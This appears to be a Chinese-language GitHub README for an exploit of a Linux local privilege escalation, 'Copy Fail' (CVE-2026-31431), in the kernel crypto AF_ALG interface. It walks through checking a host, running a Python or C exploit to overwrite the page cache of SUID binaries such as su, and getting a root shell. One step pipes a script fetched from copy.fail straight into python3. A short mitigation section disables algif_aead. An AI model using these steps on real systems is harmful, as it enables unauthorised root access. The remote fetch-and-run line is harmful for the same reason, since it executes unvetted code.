CybroZeus/Copy-Fail-Exploit-CVE-2026-31431

# Copy Fail (CVE-2026-31431) – 漏洞利用指南 ## ⚠️ 免责声明 本内容仅供教育和授权安全测试使用。请**勿**在未经明确许可的系统上运行此程序。 ## 📌 概述 **Copy Fail (CVE-2026-31431)** 是一个影响内核加密 **API**（通过 `AF_ALG`）的 **Linux 本地提权 (LPE)** 漏洞。 它允许无特权用户覆盖 SUID 二进制文件（例如，`/usr/bin/su`）的页缓存数据，从而获取 **root 权限**。 ## 🧠 前置条件 ### 系统要求 - Linux 内核（存在漏洞 – 取决于补丁状态） - 已启用 `AF_ALG` - 已加载 `algif_aead` 模块 ### Python 漏洞利用要求 - Python **3.10+** - 支持以下特性： - `os.splice` - `socket(AF_ALG)` ## 🔍 检查漏洞状态 ``` uname -a grep -i authencesn /proc/crypto lsmod | grep alg ``` 预期指标： - `authencesn(hmac(sha256),cbc(aes))` - 已加载 `algif_aead` ## 🐍 运行 Python 漏洞利用程序 ### 1. 直接执行 ``` python3 copy_fail_exploit.py ``` ### 2. 或通过 curl 执行（如果是远程托管的） ``` curl https://copy.fail/exp | python3 ``` ### 3. 触发 root shell ``` su id ``` 预期结果： ``` uid=0(root) ``` ## ⚠️ 常见问题 ### ❌ 错误：`os.splice not found` 原因： - Python 版本 < 3.10 - 受限的构建版本 解决方案： - 使用更新的 Python 二进制文件 - 上传静态编译的 Python 解释器 ## ⚙️ 编译 C 语言版本 ### 1. 编译 ``` gcc copy_fail_exploit.c -o copy_fail_exploit ``` ### 2. 赋予执行权限 ``` chmod +x copy_fail_exploit ``` ### 3. 运行漏洞利用程序 ``` ./copy_fail_exploit su ``` ## ⚠️ 常见问题 ### ❌ 漏洞利用程序运行成功但未获取 root 可能的原因： - 内核已打补丁 - 偏移量不正确 - 环境不匹配 ### ❌ 编译错误 安装所需工具： ``` apt update && apt install build-essential ``` ## 🧪 故障排除 ### 检查系统是否已打补丁 ``` dmesg | grep -i alg ``` ### 验证模块 ``` lsmod | grep algif_aead ``` ## 🛡️ 缓解措施 ### 禁用存在漏洞的模块 ``` echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf rmmod algif_aead ``` ### 应用内核补丁 更新您的系统： ``` apt update && apt upgrade ``` ## 📌 备注 - 漏洞利用仅修改**页缓存**（非持久性） - 需要本地访问权限 - 默认情况下无法被远程利用 ## 🧠 最终建议 如果漏洞利用失败，请考虑： - 内核已打补丁 - 环境限制 - 其他提权向量（SUID、capabilities、sudo 配置错误） ## 📚 参考资料 - CVE-2026-31431 - https://copy.fail ## 👨‍💻 作者留言 请仅在实验室、CTF 和授权的渗透测试中负责任地使用此漏洞利用程序。

标签：0day, AF_ALG, algif_aead, Copy Fail, Crypto API, CSV导出, CVE-2026-31431, LPE, Page Cache, Python, Root提权, SUID, Web报告查看器, 内核漏洞, 协议分析, 子域名枚举, 安全渗透, 提权EXP, 数据展示, 无后门, 本地提权, 权限提升, 漏洞复现, 系统安全, 红队, 网络安全, 逆向工具, 隐私保护